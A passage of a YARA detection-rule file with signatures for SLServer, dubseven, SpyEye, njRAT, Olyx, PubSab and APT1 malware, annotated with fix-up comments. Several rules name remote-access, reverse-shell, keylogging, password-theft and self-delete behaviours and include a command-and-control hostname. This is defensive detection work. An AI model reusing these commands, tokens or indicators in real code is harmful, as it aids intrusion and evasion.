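    // Flags a PDF that references an embedded or remote target (/Launch,
    // /GoToE or /GoToR) together with two of the keys that carry the
    // target itself (/URL, /Action, /Filespec): the "exploit hidden in an
    // embedded PDF" technique from the referenced write-up.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        ref = "https://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/"
        weight = 2

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"

        $meth0 = /\/Launch/
        $meth1 = /\/GoTo(E|R)/ //means go to embedded or remote
        $attrib0 = /\/URL /
        $attrib1 = /\/Action/
        $attrib2 = /\/Filespec/

    condition:
        $magic in (0..1024) and 1 of ($meth*) and 2 of ($attrib*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile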
// https://otx.alienvault.com/pulse/5621208f4637f21ecf2aac36
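rule SLServer_command_and_control
{
    // Matches a PE file containing the SLServer C2 hostname. The PE check
    // is "MZ" at offset 0 and "PE\0\0" at the offset stored in e_lfanew
    // (0x3C); YARA evaluates an out-of-range read as undefined, so a
    // truncated file simply fails the condition.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for the C2 server."
        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"

    strings:
        $c2 = "safetyssl.security-centers.com"

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $c2
} // closing brace restored: absent from the extracted listing, required for the rule to compile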
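rule dubseven_dropper_registry_checks
{
    // Matches a PE file carrying the full set of security-product registry
    // paths the dubseven dropper probes (mostly Chinese AV vendors plus
    // Avira). All seven are required; the "Avira Destop" spelling is the
    // malware's own and must be kept as-is.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for registry keys checked for by the dropper"

    strings:
        $reg1 = "SOFTWARE\\360Safe\\Liveup"
        $reg2 = "Software\\360safe"
        $reg3 = "SOFTWARE\\kingsoft\\Antivirus"
        $reg4 = "SOFTWARE\\Avira\\Avira Destop"
        $reg5 = "SOFTWARE\\rising\\RAV"
        $reg6 = "SOFTWARE\\JiangMin"
        $reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of ($reg*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile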
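rule dubseven_dropper_dialog_remains
{
    // Matches a PE file containing either of two UTF-16LE dialog/resource
    // names left over in the dubseven dropper. The "wide" modifier is
    // essential here: these live in resource data, not in ASCII strings.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for related dialog remnants. How rude."

    strings:
        $dia1 = "fuckMessageBox 1.0" wide
        $dia2 = "Rundll 1.0" wide

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and any of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile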
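rule dubseven_file_set
{
    // Matches a PE file that references at least three of the component
    // paths the UP007 loader drops under an "Internet Explorer" directory.
    // Only three are required because, per the author, the set varies
    // between samples. Paths are relative (no drive/profile prefix), so
    // they match regardless of the install root.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for service files loading UP007"

    strings:
        $file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
        $file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
        $file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
        $file4 = "\\Microsoft\\Internet Explorer\\main.dll"
        $file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
        $file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
        $file7 = "\\Microsoft\\Internet Explorer\\mon"
        $file8 = "\\Microsoft\\Internet Explorer\\runas.exe"

    condition:
        //MZ header //PE signature //Just a few of these as they differ
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 3 of ($file*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile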
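rule SLServer_mutex
{
    // Matches a PE file containing the SLServer mutex name. Single fixed
    // IoC; pairs with the other SLServer_* rules for corroboration.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for the mutex."
        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"

    strings:
        $mutex = "M&GX^DSF&DA@F"

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex
} // closing brace restored: absent from the extracted listing, required for the rule to compile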
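rule SLServer_campaign_code
{
    // Matches a PE file containing the campaign identifier embedded in the
    // SLServer sample. Campaign codes change per operation, so expect this
    // to miss later builds even when the other SLServer_* rules hit.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for the related campaign code."
        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"

    strings:
        $campaign = "wthkdoc0106"

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $campaign
} // closing brace restored: absent from the extracted listing, required for the rule to compile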
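rule SLServer_unknown_string
{
    // Matches a PE file containing a unique string of unknown purpose
    // observed in the SLServer sample. Useful for clustering builds;
    // low standalone confidence because its role is not understood.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Searches for a unique string."
        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"

    strings:
        $string = "test-b7fa835a39"

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $string
} // closing brace restored: absent from the extracted listing, required for the rule to compile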
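rule maindll_mutex
{
    // Matches a PE file containing the mutex name used by the main.dll
    // component referenced in dubseven_file_set. Single fixed IoC.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches on the maindll mutex"
        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"

    strings:
        $mutex = "h31415927tttt"

    condition:
        //MZ header  //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex
} // closing brace restored: absent from the extracted listing, required for the rule to compile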
// https://otx.alienvault.com/pulse/577c802c52c9260135acd45f
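rule spyeye : banker
{
    // Memory-scan rule for SpyEye: fires on the family name or on any of
    // its config/plugin keywords and error messages. The original
    // condition "$spyeye or (any of ($a,...,$n))" lists every declared
    // string, so it is exactly "any of them". Bare "SpyEye" and short
    // tokens like "data_end" will also hit AV signature databases and
    // research tooling loaded in memory; corroborate with the longer
    // [ERROR] strings before acting on a hit.
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "SpyEye X.Y memory"
        date = "2012-05-23"
        version = "1.0"
        filetype = "memory"

    strings:
        $spyeye = "SpyEye"
        $a = "%BOTNAME%"
        $b = "globplugins"
        $c = "data_inject"
        $d = "data_before"
        $e = "data_after"
        $f = "data_end"
        $g = "bot_version"
        $h = "bot_guid"
        $i = "TakeBotGuid"
        $j = "TakeGateToCollector"
        $k = "[ERROR] : Omfg! Process is still active? Lets kill that mazafaka!"
        $l = "[ERROR] : Update is not successfull for some reason"
        $m = "[ERROR] : dwErr == %u"
        $n = "GRABBED DATA"

    condition:
        any of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile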
// https://otx.alienvault.com/pulse/58a3af44ac64af2dd71c3985
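rule OlyxStrings : Olyx Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Olyx Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-19"

    strings:
        // Anonymous string: a path under /Applications (macOS) used as the drop location
        $ = "/Applications/Automator.app/Contents/MacOS/DockLight"

    condition:
        any of them
}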
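rule OlyxCode : Olyx Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Olyx code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-19"

    strings:
        // C7 40 04 imm32 / C7 40 08 imm32 = mov dword [eax+4], imm32 ; mov dword [eax+8], imm32
        // Fills a buffer with "6666" / "\\\\" four bytes at a time.
        $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
        $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }

    condition:
        any of them
}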
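rule PubSabStrings : PubSab Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "PubSab Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-19"

    strings:
        $ = "_deamon_init"              // note the misspelling; it is part of the indicator
        $ = "com.apple.PubSabAgent"     // launch-agent style label
        $ = "/tmp/screen.jpeg"          // screenshot output path

    condition:
        any of them
}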
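rule PubSabCode : PubSab Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "PubSab code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-19"

    strings:
        // imul eax, [ebp-1Ch], 37h ; mov edx, ecx ; sub edx, eax ; mov [ebp-1Ch], edx
        // (arithmetic step of the string decryption routine)
        $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }

    condition:
        any of them
}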
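rule RookieStrings : Rookie Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Rookie Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-25"

    strings:
        // Distinctive User-Agent-style token (case-sensitive)
        $ = "RookIE/1.0"

    condition:
        any of them
}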
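rule RookieCode : Rookie Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Rookie code features"
        author = "Seth Hardy"
        last_modified = "2014-06-25"

    strings:
        // Byte-by-byte stack construction (mov byte [..], imm8) of "AutoConfigURL",
        // hiding the registry value name from plain string scans
        $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 }
        // Same construction for "ProxyEnable"
        $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 }
        // mov ebx, [0x40A110] ... call ebx ; mov dl, [esi] ; xor dl, al ; mov [esi], dl
        // (original author's note: xor on rand value?) -- absolute address makes this image-base specific
        $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 }

    condition:
        any of them
}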
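rule RooterCode : Rooter Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Rooter code features"
        author = "Seth Hardy"
        last_modified = "2014-07-10"

    strings:
        // xor byte [eax+disp32], 30h ; inc eax ; cmp eax, 5000h ; jl
        // single-byte XOR (0x30) decryption loop over a 0x5000-byte blob
        $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 }

    condition:
        any of them
}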
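rule SafeNetCode : SafeNet Family
{
    // Restored the missing closing brace so the rule compiles.
    // Fixed the disassembly comment: the immediate F8 D0 40 00 is 0x40D0F8, not 0x50D0F8.
    meta:
        description = "SafeNet code features"
        author = "Seth Hardy"
        last_modified = "2014-07-16"

    strings:
        // add edi, 14h ; cmp edi, 40D0F8h  (absolute address: image-base specific)
        $ = { 83 C7 14 81 FF F8 D0 40 00 }

    condition:
        any of them
}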
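rule SafeNetStrings : SafeNet Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Strings used by SafeNet"
        author = "Seth Hardy"
        last_modified = "2014-07-16"

    strings:
        $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"   // 64-char key/token
        $ = "/safe/record.php"                                                   // check-in URI
        $ = "_Rm.bat" wide ascii                                                 // self-delete batch name
        $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" wide ascii                     // batch template (CRLF + tabs)
        $ = "Ext.org" wide ascii

    condition:
        any of them
}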
      
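rule ScarhiknStrings : Scarhikn Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Scarhikn Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-25"

    strings:
        $ = "9887___skej3sd"
        // Short, generic token; matching it alone satisfies the rule
        $ = "haha123"

    condition:
        any of them
}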
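rule ScarhiknCode : Scarhikn Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Scarhikn code features"
        author = "Seth Hardy"
        last_modified = "2014-06-25"

    strings:
        // Decryption loops: mov cl, [key+disp32] ; xor [buf+idx], cl ; ... ; jb (loop)
        $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
        // Variant using repne scasb (F2 AE) to measure the string length each iteration
        $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }

    condition:
        any of them
}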
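rule WimmieShellcode : Wimmie Family
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        description = "Wimmie code features"
        author = "Seth Hardy"
        last_modified = "2014-07-17"

    strings:
        // dec ecx ; xor [ecx+edi], ah ; cmp ecx, 0 ; ja (loop) ; lea edi, [40104Dh] ; mov ecx, 30Ch
        // (absolute address makes this image-base specific)
        $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
        // mov ecx, 1DB4h ; [8 bytes] ; same dec/xor/cmp loop head
        $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }

    condition:
        any of them
}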
// https://otx.alienvault.com/pulse/5810d51fbe8776217ed00f4a
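rule network_traffic_njRAT
{
    // Restored the missing closing brace so the rule compiles.
    // Fixed the misspelled meta key "descripion" -> "description" so tooling that
    // reads rule metadata picks it up; normalised the hash2/hash3 spacing.
    meta:
        author = "info@fidelissecurity.com"
        description = "njRAT - Remote Access Trojan"
        comment = "Rule to alert on network traffic indicators"
        filetype = "PCAP - Network Traffic"
        date = "2013-07-15"
        version = "1.0"
        hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b"
        hash2 = "3576d40ce18bb0349f9dfa42b8911c3a"
        hash3 = "24cc5b811a7f9591e7f2cb9a818be104"
        hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52"
        hash5 = "a98b4c99f64315aac9dd992593830f35"
        hash6 = "5fcb5282da1a2a0f053051c8da1686ef"
        hash7 = "a669c0da6309a930af16381b18ba2f9d"
        hash8 = "79dce17498e1997264346b162b09bde8"
        hash9 = "fc96a7e27b1d3dab715b2732d5c86f80"
        ref1 = "http://bit.ly/19tlf4s"
        ref2 = "http://www.fidelissecurity.com/threatadvisory"
        ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html"
        ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf"

    strings:
        // Protocol command tokens; "|'|'|" is the field delimiter used on the wire
        $string1 = "FM|'|'|"            // File Manager
        $string2 = "nd|'|'|"            // File Manager
        $string3 = "rn|'|'|"            // Run File
        $string4 = "sc~|'|'|"           // Remote Desktop
        $string5 = "scPK|'|'|"          // Remote Desktop
        $string6 = "CAM|'|'|"           // Remote Cam
        $string7 = "USB Video Device[endof]" // Remote Cam
        $string8 = "rs|'|'|"            // Reverse Shell
        $string9 = "proc|'|'|"          // Process Manager
        $string10 = "k|'|'|"            // Process Manager (very short; most prone to chance matches)
        $string11 = "RG|'|'|~|'|'|"     // Registry Manipulation
        $string12 = "kl|'|'|"           // Keylogger file
        $string13 = "ret|'|'|"          // Get Browser Passwords
        $string14 = "pl|'|'|"           // Get Browser Passwords
        $string15 = "lv|'|'|"           // General
        $string16 = "prof|'|'|~|'|'|"   // Server rename
        $string17 = "un|'|'|~[endof]"   // Uninstall
        $idle_string = "P[endof]"       // Idle Connection (keep-alive)

    condition:
        // Any command token, or more than four keep-alive beacons in the capture
        // (#idle_string is the occurrence count, so a single "P[endof]" is not enough)
        any of ($string*) or #idle_string > 4
}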
      
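rule njrat1: RAT
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "Brian Wallace @botnet_hunter"
        author_email = "bwall@ballastsecurity.net"
        date = "2015-05-27"
        description = "Identify njRat"

    strings:
        // Group a: firewall-exception command and the env var that suppresses zone-check prompts
        $a1 = "netsh firewall add allowedprogram " wide
        $a2 = "SEE_MASK_NOZONECHECKS" wide

        // Group b: keylogger marker and command tail
        $b1 = "[TAP]" wide
        $b2 = " & exit" wide

        // Group c: self-delete command lines ($c1 deliberately starts mid-word)
        $c1 = "md.exe /k ping 0 & del " wide
        $c2 = "cmd.exe /c ping 127.0.0.1 & del" wide
        $c3 = "cmd.exe /c ping" wide

    condition:
        // One indicator from each group; all strings are UTF-16 only (wide, no ascii)
        1 of ($a*) and 1 of ($b*) and 1 of ($c*)
}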
// https://otx.alienvault.com/pulse/5975eded481b4c7c5af5f810
// https://otx.alienvault.com/pulse/58ab817bac3cdc0d5b2c7b4d
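rule BANGAT_APT1
{
    // Restored the missing closing brace so the rule compiles.
    // $s1-$s7 are the same strings as AURIGA_APT1 in this file; with "all of them"
    // every BANGAT hit is also an AURIGA hit.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "superhard corp." wide ascii
        $s2 = "microsoft corp." wide ascii
        $s3 = "[Insert]" wide ascii
        $s4 = "[Delete]" wide ascii
        $s5 = "[End]" wide ascii
        $s6 = "!(*@)(!@KEY" wide ascii
        $s7 = "!(*@)(!@SID=" wide ascii
        $s8 = "end      binary output" wide ascii
        $s9 = "XriteProcessMemory" wide ascii
        $s10 = "IE:Password-Protected sites" wide ascii
        $s11 = "pstorec.dll" wide ascii

    condition:
        all of them
}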
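rule APT1_TARSIP_ECLIPSE
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "\\pipe\\ssnp" wide ascii
        $2 = "toobu.ini" wide ascii
        $3 = "Serverfile is not bigger than Clientfile" wide ascii
        $4 = "URL download success" wide ascii

    condition:
        // Three of the four
        3 of them
}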
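rule AURIGA_APT1
{
    // Restored the missing closing brace so the rule compiles.
    // Strict subset of BANGAT_APT1's string set: any BANGAT hit also matches here.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "superhard corp." wide ascii
        $s2 = "microsoft corp." wide ascii
        $s3 = "[Insert]" wide ascii
        $s4 = "[Delete]" wide ascii
        $s5 = "[End]" wide ascii
        $s6 = "!(*@)(!@KEY" wide ascii
        $s7 = "!(*@)(!@SID=" wide ascii

    condition:
        all of them
}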
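rule HACKSFASE1_APT1
{
    // Restored the missing closing brace so the rule compiles.
    // ccrewSSLBack2 in this file matches the last seven bytes of this pattern,
    // so every hit here also fires ccrewSSLBack2.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = {cb 39 82 49 42 be 1f 3a}

    condition:
        all of them
}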
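rule APT1_WEBC2_HEAD
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // $3 and $4 are generic HTTP/HTML tokens; precision comes from requiring all four
        $1 = "Ready!" wide ascii
        $2 = "connect ok" wide ascii
        $3 = "WinHTTP 1.0" wide ascii
        $4 = "<head>" wide ascii

    condition:
        all of them
}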
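rule CALENDAR_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // $s1-$s4 are ordinary feed/XML element names; only the conjunction of all
        // seven $s strings is meaningful
        $s1 = "content" wide ascii
        $s2 = "title" wide ascii
        $s3 = "entry" wide ascii
        $s4 = "feed" wide ascii
        $s5 = "DownRun success" wide ascii
        $s6 = "%s@gmail.com" wide ascii
        $s7 = "<!--%s-->" wide ascii
        // Encoded blobs; all three required as the alternative trigger
        $b8 = "W4qKihsb+So=" wide ascii
        $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
        $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii

    condition:
        all of ($s*) or all of ($b*)
}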
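rule APT1_WEBC2_Y21K
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Base64-encoded command words (padding stripped)
        $1 = "Y29ubmVjdA" wide ascii // connect
        $2 = "c2xlZXA" wide ascii // sleep
        $3 = "cXVpdA" wide ascii // quit
        $4 = "Y21k" wide ascii // cmd
        $5 = "dW5zdXBwb3J0" wide ascii // unsupport

    condition:
        // Four of five; $4 is only four characters and should not carry the match alone
        4 of them
}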
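rule APT1_WEBC2_CSON
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $httpa1 = "/Default.aspx?INDEX=" wide ascii
        $httpa2 = "/Default.aspx?ID=" wide ascii
        // Both $httpb strings are common in benign HTTP clients; they are only
        // required in addition to a URI and an executable name
        $httpb1 = "Win32" wide ascii
        $httpb2 = "Accept: text*/*" wide ascii
        $exe1 = "xcmd.exe" wide ascii
        $exe2 = "Google.exe" wide ascii

    condition:
        1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
}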
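rule APT1_WEBC2_TOCK
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // $1/$2 are standard registry names; $3 (HTML comment with IE conditional) is the distinctive one
        $1 = "InprocServer32" wide ascii
        $2 = "HKEY_PERFORMANCE_DATA" wide ascii
        $3 = "<!---[<if IE 5>]id=" wide ascii

    condition:
        all of them
}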
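rule ccrewDownloader2
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Hard-coded key/token blobs; any one is sufficient
        $a = "3gZFQOBtY3sifNOl" wide ascii
        $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
        $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii

    condition:
        any of them
}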
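rule ccrewSSLBack2
{
    // Restored the missing closing brace so the rule compiles.
    // This 7-byte pattern is the tail of HACKSFASE1_APT1's pattern in this file,
    // so it is the broader of the two.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = {39 82 49 42 BE 1F 3A}

    condition:
        any of them
}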
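rule GLOOXMAIL_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Kill process success!" wide ascii
        $s2 = "Kill process failed!" wide ascii
        $s3 = "Sleep success!" wide ascii
        $s4 = "based on gloox" wide ascii   // gloox is an open-source XMPP library; alone it is not an indicator
        $pdb = "glooxtest.pdb" wide ascii   // PDB path is sufficient on its own

    condition:
        all of ($s*) or $pdb
}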
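rule HACKSFASE2_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Error strings from the implant's TLS-style handshake code
        $s1 = "Send to Server failed." wide ascii
        $s2 = "HandShake with the server failed. Error:" wide ascii
        $s3 = "Decryption Failed. Context Expired." wide ascii

    condition:
        all of them
}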
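rule MANITSME_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Installer strings (service hosted by svchost); $s3/$s4 are generic on their own
        $s1 = "Install an Service hosted by SVCHOST." wide ascii
        $s2 = "The Dll file that to be released." wide ascii
        $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
        $s4 = "svchost.exe" wide ascii
        // Debug/chat strings
        $e1 = "Man,it's me" wide ascii
        $e2 = "Oh,shit" wide ascii
        $e3 = "Hallelujah" wide ascii
        $e4 = "nRet == SOCKET_ERROR" wide ascii
        // PDB paths; either one is sufficient alone
        $pdb1 = "rouji\\release\\Install.pdb" wide ascii
        $pdb2 = "rouji\\SvcMain.pdb" wide ascii

    condition:
        (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
}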
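rule AURIGA_driver_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Services\\riodrv32" wide ascii
        $s2 = "riodrv32.sys" wide ascii
        $s3 = "svchost.exe" wide ascii
        $s4 = "wuauserv.dll" wide ascii
        $s5 = "arp.exe" wide ascii
        $pdb = "projects\\auriga" wide ascii   // project path fragment; sufficient alone

    condition:
        all of ($s*) or $pdb
}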
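rule ccrewMiniasp
{
    // Restored the missing closing brace so the rule compiles.
    // Overlaps with MiniASP ($PDB, nocase) and MINIASP_APT1 ($s5 contains "device_t=") in this file.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "MiniAsp.pdb" wide ascii   // case-sensitive here, unlike MiniASP's $PDB
        $b = "device_t=" wide ascii     // short query parameter; matches on its own

    condition:
        any of them
}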
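rule BOUNCER_DLL_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Function name and usage banner of the port-bounce component
        $s1 = "new_connection_to_bounce():" wide ascii
        $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii

    condition:
        all of them
}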
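rule APT1_WEBC2_UGX
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii   // Run-key persistence (upper-case spelling is part of the indicator)
        $exe = "DefWatch.exe" wide ascii
        $html = "index1.html" wide ascii
        // Command markers: reversed "quit", "cmd", "unsupport" inside !@#...#@! delimiters
        $cmd1 = "!@#tiuq#@!" wide ascii
        $cmd2 = "!@#dmc#@!" wide ascii
        $cmd3 = "!@#troppusnu#@!" wide ascii

    condition:
        3 of them
}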
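rule APT1_WEBC2_TABLE
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $msg1 = "Fail To Execute The Command" wide ascii
        $msg2 = "Execute The Command Successfully" wide ascii
        /*
        $gif1 = /\w+\.gif/
        */
        $gif2 = "GIF89" wide ascii   // GIF magic; generic, only meaningful with both $msg strings

    condition:
        // With $gif1 commented out only three strings remain, so this is effectively "all of them"
        3 of them
}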
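rule ccrewQAZ
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Keyboard-walk password; also a common weak password in unrelated software
        $a = "!QAZ@WSX" wide ascii

    condition:
        $a
}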
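rule MoonProject
{
    // Restored the missing closing brace so the rule compiles.
    // Dropped the former $d, which duplicated $b byte-for-byte; with "any of them"
    // the match set is unchanged.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "Serverfile is smaller than Clientfile" wide ascii
        $b = "\\M tools\\" wide ascii
        $c = "MoonDLL" wide ascii

    condition:
        any of them
}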
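rule APT1_Revird_svc
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $dll1 = "nwwwks.dll" wide ascii
        $dll2 = "rdisk.dll" wide ascii
        $dll3 = "skeys.dll" wide ascii
        $dll4 = "SvcHost.DLL.log" wide ascii
        // Export names typical of a service DLL; common in benign software, hence the pairing with a $dll name
        $svc1 = "InstallService" wide ascii
        $svc2 = "RundllInstallA" wide ascii
        $svc3 = "RundllUninstallA" wide ascii
        $svc4 = "ServiceMain" wide ascii
        $svc5 = "UninstallService" wide ascii

    condition:
        1 of ($dll*) and 2 of ($svc*)
}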
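rule BISCUIT_GREENCAT_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "zxdosml" wide ascii
        $s2 = "get user name error!" wide ascii
        $s3 = "get computer name error!" wide ascii
        $s4 = "----client system info----" wide ascii
        $s5 = "stfile" wide ascii
        $s6 = "cmd success!" wide ascii

    condition:
        all of them
}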
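rule APT1_WEBC2_GREENCAT
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "reader_sl.exe" wide ascii   // mimics the Adobe Reader speed-launcher name
        $2 = "MS80547.bat" wide ascii
        $3 = "ADR32" wide ascii
        $4 = "ControlService failed!" wide ascii

    condition:
        3 of them
}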
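rule APT1_WEBC2_DIV
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii   // hard-coded GUID
        $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii   // Run-key persistence
        // $3/$4 are stock MFC / IE strings; they only count toward the 3-of-4 threshold
        $3 = "Hello from MFC!" wide ascii
        $4 = "Microsoft Internet Explorer" wide ascii

    condition:
        3 of them
}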
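rule LIGHTDART_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "ret.log" wide ascii
        $s2 = "Microsoft Internet Explorer 6.0" wide ascii
        $s3 = "szURL Fail" wide ascii
        $s4 = "szURL Successfully" wide ascii
        $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii   // date-stamped request format string

    condition:
        all of them
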